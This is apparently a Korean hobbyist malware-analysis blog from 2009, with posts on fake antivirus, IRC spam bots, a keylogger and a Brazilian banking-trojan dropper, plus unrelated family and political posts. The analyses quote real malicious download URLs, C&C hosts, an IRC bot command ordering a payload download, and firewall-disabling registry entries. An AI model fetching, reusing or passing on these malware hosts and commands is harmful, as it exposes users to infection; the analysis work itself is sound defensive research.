malwareL4B

몇달 전에 3322.org를 대체할 만한 ddns 서비스라고 해서 optus.nu라는 걸 알게 됐었습니다.
그래서 추이를 살펴보고 있었는데 별 다른 특이사항은 없더군요..

oprus.nu로 검색을 하니 몇개의 도메인들이 나오는 듯 한데 그 중에서 하나가 수상해서 확인해 봤습니다.

hxxp://furowepulad.optus.nu/addicted-to-scrapbookingcom.html


사이트에 접속하면 뭔가를 막 하다가 아래와 같은 팝업창이 뜹니다.

악성코드가 많으니 빠르고(quick) 무료인(free) 스캐닝을 해라....라는 메시지군요...
확인을 클릭하면 아래처럼 화면이 바뀝니다.

누가 봐도 가짜라는 걸 알 수 있습니다.
요즘 같은 세상에 네티즌을 너무 무시하는 듯한 행동으로 보입니다. -_-
저는 파티션을 4개로 나눠서 쓰는데 2개 밖에 없다는군요..
일단 무슨 짓을 하는지 놔둬 봤습니다.

악성코드가 많아서 데이터 손실이 있을 수 있으니 빨리 치료하라는 군요..
확인을 누르면 팝업창이 뜨는 것처럼 화면이 바뀝니다.

전 Window 고전 테마를 쓰는데 뜨는 팝업창은 XP 테마군요...-_-
remove all을 클릭하든 다른 곳을 클릭하든지 간에 파일을 하나 다운로드 합니다.

파일명이 참...

실행해서 설치해 봤습니다.
설치하고 나니 랜덤한 사이트로 접속을 하고 있었습니다.

이렇게 몇분 정도 접속을 하다가 또 몇분 쉬었다가를 계속 반복합니다.

이런 접속을 시도하는 프로세스를 확인해보니 b.exe라는 파일이었습니다.

b.exe가 있는 폴더에 가니 몇개의 파일이 더 있습니다.

a.exe라는 파일도 보입니다.

b.exe는 계속 프로세스가 실행되어 있으면서 랜덤한 사이트로 접속을 하고 있었고 a.exe는 별다른 행동은 하지 않는 것으로 보입니다.


VirusTotal 결과

a.exe : http://www.virustotal.com/ko/analisis/e559346983d418f933362b1742a29e44d00ad0f653e0ff7864cb5ade520aee64-1245995846
b.exe : http://www.virustotal.com/ko/analisis/6c29b55322782b1c396fd046a471a012ceb71d43a2b400eadc7bf4969b025e65-1245996043
av-scanner.48248.exe : http://www.virustotal.com/ko/analisis/b57dc705d3bbd11501d993f83d5af56a583c98af5239911f81f6a94c00bc97e6-1245996464



질의하는 도메인이 너무 많아 모두 일일히 확인하기는 어려울 것 같은데 www.google.com이나 www.macromedia.com과 같은 사이트로도 접속하는걸로 봐서
특별히 문제가 되지 않을 듯 하지만 지속적으로 HTTP 트래픽을 발생시키기때문에 확인해보는게 좋을 듯 합니다.

얼마전 보안뉴스에 나왔던 나인볼 공격 관련 기사입니다.

http://www.boannews.com/media/view.asp?idx=16720&kind=1


검색하다가 우연히 발견한 글입니다.

http://www.martinsecurity.net/2009/06/16/nine-ball-gumblar-redux-40000-websites-compromised/




그런데 위 분석글에서 나오는 도메인들은 국내 ISP의 DNS에서는 질의 결과가 나오지 않습니다.

국내에서는 효용성이 없는 악성코드일까요??

이슈화되긴 했지만 아무튼 좀 더 확인을 해봐야겠습니다.

DNS MX 쿼리 증가 및 스팸 메일을 발송하는 악성코드 #1에 이어서 IRC 서버 접속시 다운로드하는 파일들에 대해서 분석해보도록 하겠습니다.


a.php 파일이 실행된 후에는 두개의 파일이 생성되었고 4개의 서비스가 상태가 변경되었습니다.

그리고 brenz.pl에서 a.php를 다운로드하여 실행하면 lometr.pl 사이트에 특정 파일을 요청하는데
hxxp://lometr.pl/mega/lgate.php?n=C022499D00005058 요청시 해당 파일을 실행했던 폴더에 2B.tmp(파일명은 랜덤)라는 파일이 생성되고 이 파일의 내용은 아래와 같습니다.

MCBodHRwOi8vYnJlbnoucGwvZGxsL2FiYi50eHQgMSBodHRwOi8vYnJlbnoucGwvbWV0L2dlLnR4dCAx

Base64로 인코딩되어 있었으며 디코딩하면 다음과 같습니다.

0 http://brenz.pl/dll/abb.txt 1 http://brenz.pl/met/ge.txt 1

앞서 작성했던 글에서는 암호화되었다고 말씀드렸었는데 제가 제대로 확인을 안했었나 봅니다.
다시 보니 Base64일것 같아 디코딩해보니 URL이 두개가 나오는군요..

이 두개의 파일들은 위에서 보셨던 reader_s.exe와 services.exe 파일과 동일한 파일입니다.
즉, 다운로드 한 후 파일명을 바꿔서 실행을 시키는 것입니다. 파일이 동일하다는 것은 md5sum 해쉬값을 통해서 확인할 수 있었습니다.

두개의 파일을 받은 후에는 엄청난 양의 DNS MX 쿼리가 발생하였고 그로 인해 수많은 프로세스들이 생성되었었습니다.

위 캡쳐화면은 일부에 해당하고 이후에 더 많은 프로세스들이 생성되었었습니다.

a.php 파일을 디버거로 확인해보니 해당 파일 실행시 svchost.exe 프로세스를 생성하고 있었습니다.

0x0040372E에 있는 함수를 실행하면 아래와 같이 svchost.exe 프로세스가 생성만 됩니다.

프로세스 만든 후 메모리에 쓴 후

쓰레드를 재실행합니다.

쓰레드를 재실행하고 나면 다음과 같이 2F.tmp라는 자식 프로세스가 실행되고 이 프로세스에 의해 cmd.exe를 실행하고 윈도우 자체 방화벽 기능을 비활성화시키는 명령을 실행합니다. 그리고 services.exe라는 프로세스를 또 실행시키죠..

결국 brenz.pl에서 다운받은 a.php는 reader_s.exe(/dll/abb.txt)와 services.exe(/met/ge.txt)를 다운로드하여 실행하기 위함인 것을 알 수 있습니다.

지금까지 분석했던 내용을 도식화해보면 다음과 같습니다.

/dll/abb.txt에 의해 생성되는 reaser_s.exe가 스팸 메일을 다량으로 발송하는 프로세스였고
/met/ge.txt에 의해 생성되는 services.exe가 방화벽 기능과 같은 서비스들을 중지시키는 기능을 하고 있었습니다.



분석했던 3개의 파일(a.php, abb.txt, ge.txt)에 대한 바이러스토탈 결과입니다.

a.php : http://www.virustotal.com/ko/analisis/9cf7dfad11887fa34b7bd0eefc70909d9954e3dab3725c8f2800775826305c5f-1245646438
abb.txt : http://www.virustotal.com/ko/analisis/158dd590159ba699318ac8b8d92845a2a12649d0a8454c0ddb513b87a2774c6a-1245646516
ge.txt : http://www.virustotal.com/ko/analisis/652fa9658c088e9761daf5eed8eb40d64d93e5821cb91fa389c6bf98f869424f-1245646559


국내 백신 프로그램들은 대부분 탐지를 하고 있어서 백신 업데이트가 잘 이루어지고 있다면 크게 문제될 것이 없는 듯 보입니다.
대부분이라고 한 것은 일부 악성코드를 일부 백신 프로그램이 아직 탐지를 못하고 있어서입니다. 자세한건 위 링크를 참조하시면 되겠습니다.



www.upononjob.cn이나 horobl.cn이라는 도메인도 패킷 캡쳐시 잡혔었는데 www.upononjob.cn으로 접속시 horobl.cn으로 리다이렉션 되고 있었고
horobl.cn은 접속이 되지 않아 특별히 다른 행동을 하지 않는 것으로 보입니다.
접속이 안된다기 보다는 DNS 질의시 response가 없는 것으로 보아 도메인에 대한 IP가 없는 것으로 보입니다.

해당 악성코드는 아직 분석 중인데 급히 차단해야 할 도메인이 있어 분석 도중 포스팅합니다.

해당 악성코드를 실행하면 proxima.ircgalaxy.pl로 접속합니다.




IRC 서버로 유명한 녀석이죠..

재수 좋았던건지는 모르겠지만 봇 마스터를 다른 사이트에서 파일을 다운로드하라고 명령을 내리더군요

NICK kwfqkmyt USER d020501 . . :_Service Pack 3 JOIN &virtu :u. PRIVMSG kwfqkmyt :!get http://brenz.pl/ex/a.php

다운로드하는 파일은 exe 파일이었습니다.




그리고 나서 lometr.pl에 접속해서 /mega/lgate.php?n=5B3590E0FB840577 를 요청하고 brenz.pl에서 /dll/abb.txt 파일과 /met/ge.txt 파일을 다운로드하였습니다.






lometr.pl에 요청한 파일에 대한 결과는 암호화된 내용이라 어떤 내용인지 확인을 하지 못했습니다.

GET /mega/lgate.php?n=5B3590E0FB840577 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Host: lometr.pl Connection: Keep-Alive   HTTP/1.1 200 OK Server: nginx Date: Fri, 19 Jun 2009 01:39:18 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.2.6 Content-Length: 80   MSBodHRwOi8vYnJlbnoucGwvZGxsL2FiYi50eHQgMSBodHRwOi8vYnJlbnoucGwvbWV0L2dlLnR4dCAx

추가적으로 www.upononjob.cn에서 특정 파일에 접근하고 나서 또 다른 도메인으로 리다이렉션되고 있었습니다.

GET /in.cgi?0032 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Host: www.upononjob.cn Connection: Keep-Alive   HTTP/1.1 302 Found Server: nginx Date: Fri, 19 Jun 2009 01:39:29 GMT Content-Type: text/html Connection: close Set-Cookie: SL_0032_0000=_1_; domain=www.upononjob.cn; path=/; expires=Sun, 19-Jul-2009 01:39:28 GMT Set-Cookie: TSUSER=0032; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=www.upononjob.cn Location: http://horobl.cn/index.html   <html> <head> <meta http-equiv="REFRESH" content="1; URL='http://horobl.cn/index.html'"> </head> <body> document moved <a href="http://horobl.cn/index.html">here</a> </body> </html>

보시는 것과 같이 horobl.cn으로 리다이렉션되는데 연결도 안되고 DNS에서 쿼리를 날려봐도 IP가 나오지 않았습니다.
악성코드 제작자가 실수한걸까요? ㅋ

이렇게 몇개의 도메인에 접속하고 파일 받고 하는 과정에서 몇개의 IP와도 특정 데이터를 송수신하고 있었는데 모두 암호화되어 있어서 확인을 못했습니다.
그리고 이후에는 루트 네임서버로 hotmail.com, gmail.com, web.de, aol.com, yahoo.com의 MX 레코드를 질의하더니 조금 후에는 랜덤한 DNS로 랜덤한 도메인에 대한 MX 레코드값을 질의하고 있었습니다.

질의 후에는 메일서버를 통해 스팸메일로 보이는 메일을 다량으로 보내고 있었습니다.





추가 도메인에서 받은 파일은 내일 분석해볼 생각입니다. ^^

어제 일이 좀 있어서 10시쯤에 끝나고 집에 들어가면서 와이프에게 전화를 했습니다.

오늘 정기PM때문에 새벽 2시30분에 일어나서 나가야 하니 빨리 와서 씻고 자라하더군요..

잠시 후 문자가 왔습니다.

윤호한테오늘은아
빠가바뻐서늦게오
시니까먼저자자
그랬더니택시타래
ㅋㅋ

요즘 윤호랑 좀 잘 놀아줬더니 아빠가 빨리 보고 싶었나 봅니다.

집 앞에 와서 보니 불이 꺼져 있어서 자나보다 싶었습니다.

문을 열고 들어가자 윤호가 거실에서 머리만 빼꼼~히 내밀면서 저를 보고 씨~익 웃더군요...ㅋㅋ

일찍 나가야 하지만 오늘도 회식때문에 늦을거 같아 좀 놀아줬습니다.



윤호가 택시타라고 하자 와이프가 윤호에게 물어봤다더군요..





마눌 : "윤호야~ 아빠 택시타고 오면 아빠 택시비 윤호가 줄꺼야?"

윤호 : "아니!!"




-_-;;






요즘 점점 말도 늘고 이쁜짓도 많이 해서 재미있어집니다. ㅎㅎ

허니넷을 통해 획득한 파일입니다.

File name : yeah.exe
File size : 66734 byte
md5sum : b6d37181c6c5fba6dbd115ca14f15141


처음 실행했을땐 별거 아니라 생각했는데 생각보다 재미있는 녀석이라 포스팅합니다. ^^;

해당 파일을 실행하면 alosha.endofinternet.org의 8333번 포트로 접속합니다.

접속시 뭔가 데이터를 전송하고 있는데 뭔지는 잘 파악이 안되는군요..-_-;;

접속 후 전송하는 내용을 보aus alosha.endofinternet.org:8333 웹 서버로 특정 데이터를 계속 전송하는데 POST 방식을 사용하고 있었고
URL은 날짜와 시간으로로 된 경로명의 jsp 파일로 전송하고 있었습니다.

하지만 최초 연결 후 패킷을 캡쳐하는 동안에는 별다른 데이터를 전송하지 않고 있었고 모두 Contect-Length가 0이었습니다.
이런 사실들로 미루어 보아 최초 접속 후에는 Health-Check를 하는게 아닌가 하는 생각이 듭니다.

그리고 TCPView로 확인해보면 alosha.endofinternet.org(158.182.6.234)의 8333 포트로 연결되어 ESTABLISHED된 것을 확인할 수 있었습니다.

시스템에서의 변화는 파일이 4개가 생성되었고 서비스가 2개 추가되었습니다.

해당 서비스는 sbchost.exe를 통해서 서비스가 구동되고 있었고 해당 프로세스가 alosha.endofinternet.org(158.182.6.234)의 8333 포트로 연결하고 있었습니다.

생성되었던 oschkl.rxr 파일이 위에 보이시는 yrxkzgfp 서비스를 구동하는 파일이었고 나머지 3개의 파일은 Network Connection Manager 서비스와
연관이 있는 파일이었습니다.

그런데 이 3개의 파일들이 모두 각각 특징을 가지고 있었습니다.

oschkl.hbv : 언제 어떤 프로세스를 실행했는지에 대한 기록 저장
oschkl.gtm : 사용자가 실행시킨 프로세스에 DLL 인젝션되는 파일
438d5.kol : 어디에 사용되는지 잘 모르겠지만 내용은 0만 가지고 있음

oschkl.hbv 파일은 IE를 후킹해서 오픈한 사이트와 입력한 문자열들도 모두 저장하고 있었습니다.
아래 그림을 보시면 시간 정보와 실행한 프로세스 혹은 선택한 프로그램에 대한 정보를 기록하고 있었고
naver.com에 접속해서 demantos라는 아이디와 hahaha라는 패스워드를 입력한 결과도 저장하고 있었습니다.

oschkl.htm은 현재 실행되고 있는 모든 프로세스에 DLL 인젝션되고 있었고 새로 실행되는 프로세스에도 인젝션을 하고 있었으며
모든 프로세스에서 발생되는 이벤트(?)들을 기록하고 있었습니다.

좀 더 확인을 해보니 사용자가 입력한 키값도 그대로 저장하고 있더군요(키보드 후킹)
아래 내용은 제가 시작 -> 실행에서 services.msc를 입력한 후 mmc.exe가 실행된 것을 후킹한 내용과 서비스 관리 메뉴에서 yrxkzgfp 서비스를 검색하기 위해
y를 두번 누르고 Network Connection Manager를 찾기 위해 net을 입력한 내용입니다.

지속적으로 모니터링을 했지만 alosha.endofinternet.org:8333로 oschkl.hbv 파일의 내용은 전송하지 않는 것으로 보입니다.
하지만 계속 연결이 되어 있는 것으로 보아 해당 도메인은 C&C 도메인일 가능성이 높고
공격자가 특정 명령을 수행하면 oschkl.hbv 파일의 내용을 가져갈 것으로 생각됩니다.


안타까운 사실은 역시나 국내 백신 엔진들이 아직 탐지를 못하고 있다는 것이었습니다.

http://www.virustotal.com/ko/analisis/5d6fa1ef7df98256cb9640cd3a6b2177567a90d289d271f121cedb7eabc0f0bc-1245119564

오랜만에 악성파일 하나 분석해봅니다.

파일 정보
File Name : ValePresente.exe
File Size : 415744 byte
md5sum : ae3bf41e03a3c770d3fbf8c6ed802d38

재미있게도 파일 아이콘이 이미지 파일의 아이콘이었습니다.

해당 파일을 실행하면 아래와 같은 팝업창이 뜹니다.
스페인어 같은데 무슨 말인지 모르겠습니다. 그냥 추측으로 뭔가 성공(sucesso)? 했다라는 이야기 같습니다.
악성코드가 잘 실행되었다? 라는 의미일지도 모르죠..

OK 버튼을 클릭하기 전까지는 실제 악성코드가 동작하지는 않습니다.
OK 버튼을 클릭하면 2개의 사이트에서 또 다른 바이너리 파일을 다운로드 합니다.




hxxp://agorasim001.tempsite.ws/ww/registro.exe
hxxp://************.co.kr/board/latest_skin/nzero/docu.exe

두번째 도메인은 국내 도메인이라 부득이하게 도메인명을 숨겼습니다.
대충 URL만 보더라도 제로보드라는 것을 알 수 있었습니다.

패킷을 떠보면 분명 두개의 파일을 받은걸로 나오는데 Winalysis 결과에서는 파일 변경사항이 없었습니다. -_-;;

이번에는 SysAnalyzer에서 돌려 봤더니 아래와 같은 내용들이 있었습니다.

CreateFileA(C:\Documents and Settings\demantos\Local Settings\Temporary Internet Files\Content.IE5\2JAR6RKR\registro[1].exe)       WriteFile(h=4d0)       RegOpenKeyExA (HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings)       CreateFileA(C:\Documents and Settings\demantos\Local Settings\Temporary Internet Files\Content.IE5\2JAR6RKR\registro[1].exe)       CreateFileA(C:\Documents and Settings\demantos\Local Settings\Temporary Internet Files\Content.IE5\2JAR6RKR\registro[1].exe)       WinExec(C:\Arquivos de programas\mssn.exe,0)       closesocket(4e8)       bind(4ec, port=0)       connect( 211.189.69.120:80 )       send(h=4ec)       recv(h=4ec)       CreateFileA(C:\Documents and Settings\demantos\Local Settings\Temporary Internet Files\Content.IE5\Y3MFAHGX\docu[1].exe)       WriteFile(h=4b8)       CreateFileA(C:\Documents and Settings\demantos\Local Settings\Temporary Internet Files\Content.IE5\Y3MFAHGX\docu[1].exe)       CreateFileA(C:\Documents and Settings\demantos\Local Settings\Temporary Internet Files\Content.IE5\Y3MFAHGX\docu[1].exe)       WinExec(C:\Arquivos de programas\wind32.exe,0)       ExitProcess()

파일을 다운로드는 하는 듯 한데 제가 직접 받았던 파일 사이즈와 약간 달랐습니다.
임시폴더에 있는 파일은 registro.exe가 29.9kbyte였는데 제가 직접 받았던 파일은 3.59Mbyte였습니다.
docu.exe 파일도 사이즈가 달랐습니다.

registro.exe 파일 생성(다운로드) 후 실행하는 mssn.exe과 docu.exe 파일을 생성한 후 실행하는 wind32.exe 확인 결과 모두 악성코드인 것으로 확인되었습니다.
wind32.exe는 agobot-bz 웜에 의해 생성되는 파일이었고 mssn.exe는 백도어였습니다.

다음 내용도 같이 보시겠습니다.

Urls   --------------------------------------------------   c:\Arquivos de programas\Internet Explorer\IEXPLORE.EXE http://www.americanas.com.br   http://agorasim001.tempsite.ws/ww/registro.exe   http://wintergarden.co.kr/board/latest_skin/nzero/docu.exe   ...   ExeRefs   --------------------------------------------------   File: ValePresente_dmp.exe_   c:\Arquivos de programas\Internet Explorer\IEXPLORE.EXE http://www.americanas.com.br   C:\Arquivos de programas\mssn.exe   http://agorasim001.tempsite.ws/ww/registro.exe   C:\Arquivos de programas\wind32.exe   http://wintergarden.co.kr/board/latest_skin/nzero/docu.exe

잘 보시면 Program FIles 경로가 명칭이 다른걸 확인할 수 있습니다.
아무래도 스페인어로 된 윈도우를 설치하면 Program Files가 Arquivos de programas라는 이름으로 폴더가 생성되는 듯 합니다.
(스페인어판은 설치를 안해봐서...)




----------------- 여기서부터는 C:\Arquivos de programas 폴더를 생성해서 접근~


Program Files 폴더가 폴더명이 안바뀌니 Arquivos de programas 폴더를 그냥 만들었습니다.
그리고 Arquivos de programas 폴더 아래에 Internet Explorer 폴더도 만들고 IEXPLORE.EXE 파일도 생성해놨습니다. -0-




그리고 악성코드를 실행해봤습니다.
c:\Arquivos de programas\Internet Explorer\IEXPLORE.EXE http://www.americanas.com.br 는 익스플로러로 AMERICANAS 은행 사이트를 여는데 사용되었고 c:\Arquivos de programas 폴더에 mssn.exe, RunDLL31.exe, wind32.exe 파일이 생성되어 있었습니다.




WinExec(C:\Arquivos de programas\wind32.exe,0)에서 보셨듯이 wind32.exe를 실행을 하긴 하는데 프로그램에 약간 문제가 있는 듯 합니다.
정상적으로 실행이 안되고 있었습니다.




C:\Arquivos de programas 폴더를 만들고 실행을 하니 없을때와는 상당히 다른 양상을 보였습니다.
일단 위에서 보셨던 파일 3개가 생성되었구요 C:\WINDOWS\System32\drivers에 avgmfx90.sys 파일을 생성하였고
이 파일은 PCChips라는 서비스를 구동하는 파일이었습니다.

그런데 이 서비스는 services.msc 명령을 통해서 확인을 해봤는데 보이질 않아서 gmer와 IceSword를 실행해서 확인해보니
IceSword에서는 확인이 되지 않았고 gmer에서만 확인이 되었습니다.

구글신께 문의를 해보니 avgmfx90.sys 파일은 루트킷이라고 답변을 주시더군요..
http://www.threatexpert.com/report.aspx?md5=3f56e5b64b22a4db5534a3e472817a2f


mssn.exe 프로세스는 docu.exe를 다운 받았던 *****.co.kr 사이트에 연결이 된것 같은데 상태에는 CLOSE_WAIT 상태로
계속 남아 있었습니다. CLOSE_WAIT라면 얼마 후 연결이 끊겨야 정상인데 끊기지 않고 계속 프로세스에 보이고 있었습니다.




docu.exe와 registro.exe 파일은 다운로드된 후 각각 wind32.exe와 mssn.exe 파일을 생성하고 자기 자신은 삭제를 합니다.
즉, 동일한 파일을 생성하는 것이지요..




그리고 wireshark로 패킷을 캡쳐해본 결과 docu.exe 파일을 다운로드 한 뒤 FTP 사이트로 접속하는 걸 확인할 수 있었습니다.
docu.exe는 wind32.exe와 동일한 파일이고 wind32.exe는 실행시 에러가 발생했었습니다.


오늘(15일) 확인해보니 hxxp://************.co.kr/board/latest_skin/nzero/docu.exe을 다운로드하면 memo.swf 파일을 다운로드하고 있었습니다.
memo.swf 파일은 http://ryzeurhuhbfkakm.com/?BannerID=ddddd로 리다이렉션되고 있습니다.
위 사이트는 불법대출 사이트인듯 합니다. -_-




디버거로 정적분석을 해봐야 wind32.exe나 mssn.exe가 정확하게 무슨 행동을 하는지 알 수 있을 듯 합니다.
둘 다 패킹되어 있었고(Thinstall 2.4x - 2.5x -> Jitit Software) 언패킹을 해야하는데...


일단 정리를 해보면

1. 국내 사용자들에겐 그다지 치명적이지 않다.
앞에서 보셨다시피 C:\Arquivos de programas 폴더가 있어야지만 추가적인 행동들을 하고 있었습니다.
그리고 윈도우 한글판에는 C:\Arquivos de programas 폴더가 없습니다.
즉, 추가적인 악성코드가 다운로드/실행되지 않기 때문에 큰 문제가 되지 않는다.

2. 바이러스토탈 검사 결과 국내 백신 중 V3만 ValePresente.exe를 탐지하고 있었고 docu.exe, registro.exe는 모두 탐지하지 못하고 있었습니다.
ValePresente.exe : http://www.virustotal.com/ko/analisis/44df9075c347239c7f52569283a60eb01a167ba46a71d02c890b9df00a977f42-1245051342
docu.exe : http://www.virustotal.com/ko/analisis/3498fe15e33b645efa2c2135d9d1577b54b86a6b17e33a4610f48c265465d93e-1245051279
registro.exe : http://www.virustotal.com/ko/analisis/0702fd37a56ce6c8662c30a900abc6eb289c8b8ac043c2285ab003c0a29f5e54-1245051708




반쪽짜리 분석보고서였습니다. ㅜ.ㅜ
제대로 동작을 안한데다가 정적분석을 해야하는데 귀찮아서...-_-;;

요즘들어 small talk에 글을 자주 쓰는것 같습니다.

딱 한마디만 하고 싶습니다.


'대한민국은 민주주의 국가가 아니다'라고...


여러분들은 대한민국이 민주주의 국가라고 생각하십니까?

국민들의 말 할 권리조차 빼았는 이 나라가 민주주의 국가입니까?

빈대 잡으려 초가삼간을 태우기 위해 공권력을 휘두르는게 민주주의 국가입니까?

미디어법을 통과시켜 언론을 장악해 국민들의 눈과 귀를 막으려 하는게 민주주의 국가입니까?


지금 공권력의 행태가 유신시대와 다른게 뭐가 있습니까..



대통령은 국민에게 함부로 해도 되고 강한 힘을 가진 타국의 수장들에게 머리를 숙이는게 맞다고 생각하십니까?

국민을 위해 일하겠다고 맹세한 대통령이라면

국민에게 머리 숙일 줄 알고 타국의 수장들에게 당당할 수 있어야 하는 것 아닙니까?



하긴 우리나라야 해방 직후부터 이승만이 말아먹기 시작했지만

자고로 인간이라면 발전할 수 있어야 하는데

점점 퇴보하고 있는게 아닌가 하는 생각이 듭니다.

특히 요즘엔 더 그렇구요..



일반 소시민들에게 힘내라... 조금 더 열심히 하면 된다...라고 말합니다.

소시민들이 열심히 하고 있을때 가진자들은 뭘 했습니까?

오히려 자기 뱃속 채울 생각밖에 더 했습니까?

이젠 광고에서 나오는 열심히하면 됩니다....라는 식의 광고 짜증납니다.



이젠 제발 좀 맘 편하게 살고 싶습니다.

내가 살고 있는 이 나라에 안좋은 생각 안하면서

내가 살고 있는 이 나라에 좋은 말만 할 수 있었으면 합니다.

어제 허니넷에서 획득한 파일 중 특이한 녀석이 있어서 분석해봤습니다.
그다지 특이하지 않을 수 있지만 보인에겐 좀 특이했습니다. -_-;;

일단 Dropper FTP에 접속하니 몇개의 파일들이 있었습니다.

이 중에서 다운로드하여 실행하는 악성코드는 JEW.EXE였습니다.
JEW.EXE외의 다른 파일들도 악성코드라 생각되어 Virustotal에 업로드해보니 FEG.EXE와 KICK.EXE는 악성코드가 아니라고 나왔고
TWAT.EXE는 40개 엔진 중 3개의 엔진에서만 악성코드로 탐지하고 있었습니다.
개인적으로 TWAT.EXE 파일이 뭔가 좀 의심스럽습니다. 추후 별도로 분석을 해볼 생각입니다.
바이러스토탈 결과는 제일 아래쪽 첨부하였으니 참고하시면 되겠습니다.


일단 JEW.EXE의 행동분석을 해봤습니다.

File size : 97,284 byte
md5sum : 32c4534068a9e83634b90aae40c8a1de

항상 그랬듯이 winalysis로 시스템의 변화를 살펴보았는데 레지스트리만 변경되고 파일이나 서비스 등 다른 항목에서의 변화는 없다고 나왔습니다.
그런데 확인 결과 winalysis가 저에게 거짓말을 하고 있었습니다. -_-

그런데 실제로는 C:\WINDOWS\system 폴더에 iexplorer.exe 파일이 생성되어 있었습니다.

iexplorer.exe는 JEW.EXE와 파일 사이즈 및 md5 해쉬값이 동일한 같은 파일이었습니다.

솔직히 지금까지 모르고 있었던게 우리가 사용하는 IE 브라우저의 파일명이 iexplore.exe라는 것입니다.
악성코드와 알파벳 r 하나 차이가 있습니다. 지금까지는 iexplorer.exe가 IE 브라우저의 파일명이라고 생각했었습니다.

아마 이 글을 읽고 계신 여러분들께서는 이러한 사실을 알고 계셨던 분들도 계실것이고 모르셨던 분들도 계셨을겁니다.
저는 오늘 알았습니다. ^^;


다시 본론으로 넘어오겠습니다.

악성코드 실행시 변경되는 레지스트리 중 다음과 같은 내용이 있었습니다.

HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications   \List\C:\WINDOWS\system\iexplorer.exe    C:\WINDOWS\system\iexplorer.exe:*:Enabled:iexplorer   HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications   \List\C:\WINDOWS\system\iexplorer.exe    C:\WINDOWS\system\iexplorer.exe:*:Enabled:iexplorer

윈도우 방화벽 정책에서 해당 프로그램(iexplorer.exe)의 외부 접속에 대한 허용 설정을 하는 레지스트리였습니다.

그리고 악성코드 실행시 tl6.welovewarez.com으로 접속하는 것을 확인할 수 있었습니다.

여기서 좀 이상했던 점이 있었는데 tl6.welovewarez.com이나 welovewarez.com을 nslookup으로 확인해보면 85.17.141.84라는 아이피가 나옵니다.
85.17.141.84로 reverse lookup을 해보면 google.com이 나옵니다. 둘이 어떤 관계일까요? -_-;;

아무튼 tl6.welovewarez.com의 8782번 포트로 접속하는데 IRC 서버였습니다.
제가 접속할 당시에는 IRC에서 65.x.x.x:445로 랜덤 포트스캔 명령을 전달하고 있었습니다.

IRC서버에 접속해서 명령을 받아오는 프로세스는 앞에서 생성되었던 C:\WINDOWS\system\iexplorer.exe이고
65.x.x.x로 랜덤 포트 스캔도 해당 프로세스가 수행하고 있었습니다.

결국 JEW,EXE를 실행하면 C:\WINDOWS\system\iexploere.exe를 생성하고 이 파일은 tl6.welovewarez.com의 8782번 포트로 접속하는데
tl6.welovewarez.com은 C&C 서버였고 접속 당시 해당 C&C 서버에서 좀비에게 65.x.x.x:445 포트 스캔 명령을 내리고 있었습니다.

다행히 V3, nProtect, Virobot에서는 모두 탐지하고 있었습니다.



추가적으로 확인해봐야겠지만 FTP에 있던 다른 파일들도 JEW.EXE 파일과 연관성이 있지 않을까 하는 생각이 듭니다.
특히 TWAT.EXE는 파일 사이즈도 큰데다가 3개의 엔진에서만 악성코드로 탐지하고 있어서 분명 뭔가 있을 듯 합니다.

내일도 근무니 내일 한번 확인해봐야겠습니다.



아....이런.... 어리버리한 짓을 했습니다.
FTP에서 파일을 받을때 bin 옵션을 주지 않고 그냥 받았네요. -_-;;
덕분에 TWAT.EXE가 사이즈가 왜 다른가 했더니 ASCII 모드로 받아서 그랬습니다.
TWAT.EXE 다시 받았더니 SFX RAR 파일이군요..
거기다가 SCUM.EXE 파일이 추가되었습니다. (White Zombie의 Scum of the Earth가 생각 나는군요...^^;)
어제는 없었는데 확인해보니 어제 퇴근 후에 파일이 추가된 듯 합니다.
분석해볼께 하나 더 늘었군요~

확인해보니 SCUM.EXE는 JEW.EXE와 사이즈는 다르지만 행동은 동일한 듯 합니다.
시점의 차이인지 파일의 차이인지 바이너리를 까봐야 알겠지만 SCUM.EXE를 실행하면 91.x.x.x로 스캔을 하고 있었습니다.

TWAT.exe의 바이러스토탈 결과는 삭제했습니다.
압축 파일 안에 4개의 파일이 있으니 압축을 풀어서 분석해봐야겠습니다.


바이러스토탈 검사 결과

FAM.EXE
더보기FEG.EXE
더보기HO.EXE
더보기JEW.EXE
더보기KICK.EXE
더보기SCUM.EXE
더보기

성성된 파일 중 systemServer.exe는 서비스를 구동하기 위한 파일이었고 원본 악성코드와 동일한 사이즈를 가지고 있는 동일한 파일이었습니다.

systemServer 서비스 속성입니다.

systemServer.exe 파일은 spoolsv.exe, explorer.exe, winlogon.exe 프로세스가 실행되고 있는지 차례대로 검사합니다.
만약 있다면 해당 프로세스에 revreSmetsys.dll 파일을 인젝션시켜 실행시킵니다.

악성코드 실행 당시엔 spoolsv.exe 프로세스가 실행되고 있어서 spoolsv.exe에 revreSmetsys.dll을 인젝션시켜 실행시키고 있습니다.

그리고 spoolsv.exe 프로세스는 www.520iq.com/ip.txt 파일을 요청하는 HTTP 패킷을 전송합니다.
ip.txt 파일에는 http://124.72.93.158:8761 이라는 내용이 들어 있습니다.
이것은 124.72.93.158의 8761번 포트로 연결하라는 의미로 해석할 수 있습니다.

위 패킷을 보시면 124.72.93.158의 8761번 포트로 연결을 시도하지만 실제 연결은 되지 않고 있습니다.

즉, www.520iq.com은 거쳐가는 하나의 관문 정도로만 생각할 수 있고 실제 C&C 서버는 124.72.93.158일 가능성이 큽니다.
하지만 연결이 되지 않고 있기 때문에 정확하다고 말하기는 좀 힘들 듯 합니다.



어찌되었던 www.520iq.com과 124.72.93.158은 악성 사이트라고 간주할 수 있겠습니다.


아...그리고 zkeyHook.dll은 실행 당시 어떠한 프로세스에서도 사용하고 있지 않은 것으로 보아
124.72.93.158에 접속이 된 경우에 사용되는 파일인 것으로 추정되니다.



오늘도 빈약한 분석글 읽으시느라 고생하셨습니다.
앞으로는 좀 더 양질의 분석글이 되도록 하겠습니다. ^^;;\